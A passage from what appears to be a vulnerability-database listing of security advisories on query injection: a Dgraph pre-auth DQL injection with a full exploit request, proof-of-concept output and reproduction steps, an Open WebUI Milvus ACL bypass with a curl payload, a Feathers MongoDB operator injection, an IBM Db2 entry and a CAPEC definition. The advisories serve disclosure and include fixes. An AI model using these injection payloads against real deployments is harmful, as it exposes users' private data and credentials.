copies it verbatim:\n\n```go\nres := \u0026dql.Mutation{Cond: mu.Cond}\n```\n\n`buildUpsertQuery` at `server.go:730` applies one cosmetic replacement then concatenates the raw string directly into the DQL query:\n\n```go\ncond := strings.Replace(gmu.Cond, \"@if\", \"@filter\", 1)\n// ...\nx.Check2(upsertQB.WriteString(cond))\n```\n\nThere is no escaping, no parameterization, no structural validation, and no character allowlist between the HTTP input and the query string concatenation.\n\nAn attacker crafts a `cond` value that closes the `@filter(...)` clause and opens an entirely new named query block:\n\n```\n@if(eq(name, \"nonexistent\"))\n  leak(func: has(dgraph.type)) { uid name email secret }\n```\n\nAfter `buildUpsertQuery` processes this, the resulting DQL is:\n\n```dql\n{\n  q(func: uid(0x1)) { uid }\n  __dgraph_upsertcheck_0__ as var(func: uid(0)) @filter(eq(name, \"nonexistent\"))\n  leak(func: has(dgraph.type)) { uid name email secret }\n}\n```\n\nThe DQL parser (`dql.ParseWithNeedVars`) accepts multiple query blocks within a single `{}` container. It parses `leak(...)` as a legitimate named query. The `validateResult` function at `parser.go:740` only checks for duplicate aliases and explicitly skips `var` queries. The injected query uses a unique alias, so validation passes.\n\nAll three queries execute. The results of the injected `leak` block are serialized to JSON and returned to the attacker at `http.go:498`:\n\n```go\nmp[\"queries\"] = json.RawMessage(resp.Json)\n```\n\nThe `@if` condition evaluates to false (`\"nonexistent\"` matches nothing), so the `set` mutation never actually writes data. The attack is a pure read disguised as a mutation. No data is modified.\n\n## 7. Full Chain Explanation\n\nThe attacker has no Dgraph credentials and no prior access to the server.\n\n**Step 1.** The attacker sends one HTTP request:\n\n```\nPOST /mutate?commitNow=true HTTP/1.1\nHost: TARGET:8080\nContent-Type: application/json\n\n{\n  \"query\": \"{ q(func: uid(0x1)) { uid } }\",\n  \"mutations\": [{\n    \"set\": [{\"uid\": \"0x1\", \"dgraph.type\": \"Dummy\"}],\n    \"cond\": \"@if(eq(name, \\\"nonexistent\\\"))\\n  leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key gcp_service_account_key }\"\n  }]\n}\n```\n\nNo `X-Dgraph-AccessToken` header. No `X-Dgraph-AuthToken` header. The `/mutate` endpoint has no authentication wrapper in default configuration.\n\n**Step 2.** `mutationHandler` at `http.go:345` calls `readRequest` to get the body, then `extractMutation` which calls `strconv.Unquote` on the `cond` field. The `\\n` becomes a real newline. The result is stored in `api.Mutation.Cond`.\n\n**Step 3.** The request enters `edgraph.Server.QueryNoGrpc` at `http.go:471`, which calls `doQuery` -\u003e `parseRequest` -\u003e `ParseMutationObject`. The `Cond` is copied verbatim to `dql.Mutation.Cond` at `server.go:2011`.\n\n**Step 4.** `buildUpsertQuery` at `server.go:714` processes the condition. The only transformation is `strings.Replace(gmu.Cond, \"@if\", \"@filter\", 1)` at line 730. The full string, including the injected `leak(...)` block, is written into the query builder at line 750.\n\n**Step 5.** `dql.ParseWithNeedVars` parses the constructed DQL string. It encounters three query blocks: `q`, the upsert check `var`, and the injected `leak`. All three are accepted as valid DQL.\n\n**Step 6.** `authorizeQuery` at `access.go:958` returns `nil` immediately because `AclSecretKey == nil` (ACL not configured). No predicate-level authorization is performed.\n\n**Step 7.** `processQuery` executes all three query blocks. The `leak` block traverses every node with a `dgraph.type` predicate and returns all requested fields.\n\n**Step 8.** The response is returned to the attacker at `http.go:498`. The `data.queries.leak` array contains every matching node with all their predicates, including secrets, credentials, and PII.\n\n## 8. Proof of Concept\n\n### Files\n\n| File                    | Purpose                                                    |\n| ----------------------- | ---------------------------------------------------------- |\n| report.md               | This vulnerability report                                  |\n| poc.py                  | Exploit: sends the injection and prints leaked data        |\n| docker-compose.yml      | Spins up a Dgraph cluster (1 Zero + 1 Alpha, default config) |\n| DGraphPreAuthDQL.mp4    | Screen recording of the full attack from start to exfiltration |\n\nPOC files zip:\n[LEAD_001_DQL.zip](https://github.com/user-attachments/files/25996009/LEAD_001_DQL.zip)\n\n\n### poc.py\n\nThe exploit sends a single POST to `/mutate?commitNow=true` with the crafted `cond` field. It parses the response and prints all exfiltrated records, highlighting secrets, AWS credentials, and GCP service account keys.\n\n### Tested Output\n\n```\n$ python3 poc.py\n[*] Sending crafted upsert mutation with DQL injection in cond field \u2026\n[*] HTTP 200\n[+] SUCCESS \u2014 Injected query returned 5 node(s):\n\n  [User] uid=0x1\n    name: Alice Admin\n    email: alice@corp.com\n    secret: SSN-123-45-6789\n    role: admin\n\n  [User] uid=0x2\n    name: Bob User\n    email: bob@corp.com\n    secret: SSN-987-65-4321\n    role: user\n\n  [User] uid=0x3\n    name: Eve Secret\n    email: eve@corp.com\n    secret: API_KEY_sk-live-abc123xyz\n    role: superadmin\n\n  [CloudCredential] uid=0x4\n    name: prod-aws-credentials\n    AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE\n    AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n\n  [CloudCredential] uid=0x5\n    name: gcp-bigquery-service-account\n    GCP_SERVICE_ACCOUNT_KEY: {\"type\":\"service_account\",\"project_id\":\"prod-analytics\",\"private_key\":\"-----BEGI\u2026\n\n[+] CRITICAL \u2014 Exfiltrated 5 record(s) containing secrets via pre-auth DQL injection\n    \u2192 1 AWS credential(s) \u2014 attacker can access AWS account\n    \u2192 1 GCP service account key(s) \u2014 attacker can access GCP project\n```\n\n## 9. Steps to Reproduce\n\n### Prerequisites\n\n- Python 3 with `requests` (`pip install requests`)\n- Docker and Docker Compose\n\n### Step 1: Start Dgraph\n\n```bash\ncd report\ndocker compose -f docker-compose-test.yml up -d\n```\n\nWait for health:\n\n```bash\ncurl http://localhost:8080/health\n```\n\n### Step 2: Seed test data\n\n```bash\ncurl -s -X POST http://localhost:8080/alter -d \u0027\nname: string @index(exact) .\nemail: string @index(exact) .\nsecret: string .\nrole: string .\naws_access_key_id: string .\naws_secret_access_key: string .\ngcp_service_account_key: string .\n\u0027\n\ncurl -s -X POST \u0027http://localhost:8080/mutate?commitNow=true\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"set\":[\n    {\"dgraph.type\":\"User\",\"name\":\"Alice Admin\",\"email\":\"alice@corp.com\",\"secret\":\"SSN-123-45-6789\",\"role\":\"admin\"},\n    {\"dgraph.type\":\"User\",\"name\":\"Bob User\",\"email\":\"bob@corp.com\",\"secret\":\"SSN-987-65-4321\",\"role\":\"user\"},\n    {\"dgraph.type\":\"User\",\"name\":\"Eve Secret\",\"email\":\"eve@corp.com\",\"secret\":\"API_KEY_sk-live-abc123xyz\",\"role\":\"superadmin\"},\n    {\"dgraph.type\":\"CloudCredential\",\"name\":\"prod-aws-credentials\",\"aws_access_key_id\":\"AKIAIOSFODNN7EXAMPLE\",\"aws_secret_access_key\":\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"},\n    {\"dgraph.type\":\"CloudCredential\",\"name\":\"gcp-bigquery-service-account\",\"gcp_service_account_key\":\"{\\\"type\\\":\\\"service_account\\\",\\\"project_id\\\":\\\"prod-analytics\\\",\\\"private_key\\\":\\\"-----BEGIN RSA PRIVATE KEY-----\\\\nEXAMPLEKEY\\\\n-----END RSA PRIVATE KEY-----\\\",\\\"client_email\\\":\\\"bigquery@prod-analytics.iam.gserviceaccount.com\\\"}\"}\n  ]}\u0027\n```\n\n### Step 3: Run the exploit\n\n```bash\ncd LEAD_001_DQL\npython3 poc.py\n```\n\n### What to verify\n\n1. HTTP POST returns 200 (endpoint is reachable without auth)\n2. Response contains `data.queries.leak` with an array of nodes\n3. The nodes include fields the attacker never queried through legitimate means (secrets, AWS keys, GCP keys)\n4. No data was modified in the database (the `@if` condition prevents the `set` from executing)\n\n## 10. Mitigations and Patch\n\n**Location:** `edgraph/server.go`, `buildUpsertQuery` (line 714)\n\nInstead of concatenating the raw `cond` string into the DQL query, `buildUpsertQuery` should parse the `cond` value with the DQL lexer and construct the `@filter` as a parsed AST subtree. This eliminates the injection surface entirely because the filter is built programmatically rather than spliced in as a raw string. The existing `strings.Replace(gmu.Cond, \"@if\", \"@filter\", 1)` at line 730 is a semantic transformation, not a security control, and should not be relied upon for sanitization.",
  "id": "GHSA-mrxx-39g5-ph77",
  "modified": "2026-05-04T20:08:33Z",
  "published": "2026-04-24T15:41:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-mrxx-39g5-ph77"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41327"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dgraph-io/dgraph"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dgraph: Pre-Auth Full Database Exfiltration via DQL Injection in Upsert Condition Field"
}

GHSA-MVH2-WMR8-Q886

Vulnerability from github – Published: 2026-01-31 00:30 – Updated: 2026-01-31 00:30
VLAI
Details

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5.0 - 11.5.9 and 12.1.0 - 12.1.3 could allow a local user to cause a denial of service due to improper neutralization of special elements in data query logic.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36366"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-30T22:15:54Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5.0 - 11.5.9 and 12.1.0 - 12.1.3 could allow a local user to cause a denial of service due to improper neutralization of special elements in data query logic.",
  "id": "GHSA-mvh2-wmr8-q886",
  "modified": "2026-01-31T00:30:28Z",
  "published": "2026-01-31T00:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36366"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7257681"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P5CP-R7RG-QPXC

Vulnerability from github – Published: 2026-06-17 17:57 – Updated: 2026-06-17 17:57
VLAI
Summary
Open WebUI: RAG ACL Bypass in Milvus Multitenancy Mode
Details

RAG ACL Bypass in Milvus Multitenancy Mode

Summary

This is a bypass of the fix for:

  • GHSA-h36f-rqpx-j5wx
  • CVE-2026-44560
  • "Unauthorized File and Knowledge Base Content Access via RAG Vector Search"

Open WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a resource_id and is interpolated into a Milvus expression without escaping.

An authenticated non-admin user can query:

x' or resource_id != '' or resource_id == 'x

This passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:

resource_id == 'x' or resource_id != '' or resource_id == 'x'

That returns private knowledge-base chunks belonging to other users.

Affected Configuration

Tested on:

Open WebUI: v0.9.5, commit 3660bc00f
VECTOR_DB=milvus
ENABLE_MILVUS_MULTITENANCY_MODE=true

This is not a default-vector-store issue. It affects production deployments using Milvus multitenancy.

Impact

An authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.

Root Cause

ACL permits unknown collection names:

# backend/open_webui/retrieval/utils.py
elif not await Knowledges.get_knowledge_by_id(name):
    validated.add(name)

Milvus multitenancy then treats the same name as resource_id and builds unsafe expressions:

# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py
expr=f"{RESOURCE_ID_FIELD} == '{resource_id}'"

Affected paths include:

POST /api/v1/retrieval/query/collection
POST /api/v1/retrieval/query/doc

PoC

Request:

curl -s -X POST "$TARGET/api/v1/retrieval/query/collection" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/json" \
  --data-binary @- <<'JSON'
{
  "collection_names": [
    "x' or resource_id != '' or resource_id == 'x"
  ],
  "query": "anything",
  "k": 10,
  "hybrid": false
}
JSON

Actual result: private chunks from other users' knowledge collections are returned.

Expected result: request should be rejected with 403 or return no unauthorized content.

Remediation

  1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.
  2. Escape or parameterize Milvus expression values before building filters.
  3. Reject collection names containing quotes/control characters unless they match a known internal format.
  4. Add a regression test for this payload in Milvus multitenancy mode:
x' or resource_id != '' or resource_id == 'x
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54019"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-17T17:57:43Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "# RAG ACL Bypass in Milvus Multitenancy Mode\n\n## Summary\n\nThis is a bypass of the fix for:\n\n- GHSA-h36f-rqpx-j5wx\n- CVE-2026-44560\n- \"Unauthorized File and Knowledge Base Content Access via RAG Vector Search\"\n\nOpen WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a `resource_id` and is interpolated into a Milvus expression without escaping.\n\nAn authenticated non-admin user can query:\n\n```text\nx\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\n```\n\nThis passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:\n\n```text\nresource_id == \u0027x\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\u0027\n```\n\nThat returns private knowledge-base chunks belonging to other users.\n\n## Affected Configuration\n\nTested on:\n\n```text\nOpen WebUI: v0.9.5, commit 3660bc00f\nVECTOR_DB=milvus\nENABLE_MILVUS_MULTITENANCY_MODE=true\n```\n\nThis is **not a default-vector-store issue**. It affects **production deployments using Milvus multitenancy.**\n\n## Impact\n\nAn authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.\n\n## Root Cause\n\nACL permits unknown collection names:\n\n```python\n# backend/open_webui/retrieval/utils.py\nelif not await Knowledges.get_knowledge_by_id(name):\n    validated.add(name)\n```\n\nMilvus multitenancy then treats the same name as `resource_id` and builds unsafe expressions:\n\n```python\n# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py\nexpr=f\"{RESOURCE_ID_FIELD} == \u0027{resource_id}\u0027\"\n```\n\nAffected paths include:\n\n```text\nPOST /api/v1/retrieval/query/collection\nPOST /api/v1/retrieval/query/doc\n```\n\n## PoC\n\nRequest:\n\n```bash\ncurl -s -X POST \"$TARGET/api/v1/retrieval/query/collection\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  --data-binary @- \u003c\u003c\u0027JSON\u0027\n{\n  \"collection_names\": [\n    \"x\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\"\n  ],\n  \"query\": \"anything\",\n  \"k\": 10,\n  \"hybrid\": false\n}\nJSON\n```\n\nActual result: private chunks from other users\u0027 knowledge collections are returned.\n\nExpected result: request should be rejected with 403 or return no unauthorized content.\n\n## Remediation\n\n1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.\n2. Escape or parameterize Milvus expression values before building filters.\n3. Reject collection names containing quotes/control characters unless they match a known internal format.\n4. Add a regression test for this payload in Milvus multitenancy mode:\n\n```text\nx\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\n```",
  "id": "GHSA-p5cp-r7rg-qpxc",
  "modified": "2026-06-17T17:57:43Z",
  "published": "2026-06-17T17:57:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-p5cp-r7rg-qpxc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: RAG ACL Bypass in Milvus Multitenancy Mode"
}

GHSA-P9XR-7P9P-GPQX

Vulnerability from github – Published: 2026-03-10 21:03 – Updated: 2026-03-10 22:55
VLAI
Summary
Feathers has a NoSQL Injection via WebSocket id Parameter in MongoDB Adapter
Details

Socket.IO clients can send arbitrary JavaScript objects as the id argument to any service method (get, patch, update, remove). The transport layer performs no type checking on this argument. When the service uses the MongoDB adapter, these objects pass through getObjectId() and land directly in the MongoDB query as operators. Sending {$ne: null} as the id matches every document in the collection.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.41"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@feathersjs/mongodb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T21:03:40Z",
    "nvd_published_at": "2026-03-10T20:16:39Z",
    "severity": "CRITICAL"
  },
  "details": "Socket.IO clients can send arbitrary JavaScript objects as the id argument to any service method (get, patch, update, remove). The transport layer performs no type checking on this argument. When the service uses the MongoDB adapter, these objects pass through getObjectId() and land directly in the MongoDB query as operators. Sending {$ne: null} as the id matches every document in the collection.",
  "id": "GHSA-p9xr-7p9p-gpqx",
  "modified": "2026-03-10T22:55:42Z",
  "published": "2026-03-10T21:03:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-p9xr-7p9p-gpqx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29793"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/feathersjs/feathers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Feathers has a NoSQL Injection via WebSocket id Parameter in MongoDB Adapter"
}

No mitigation information available for this CWE.

CAPEC-676: NoSQL Injection

An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.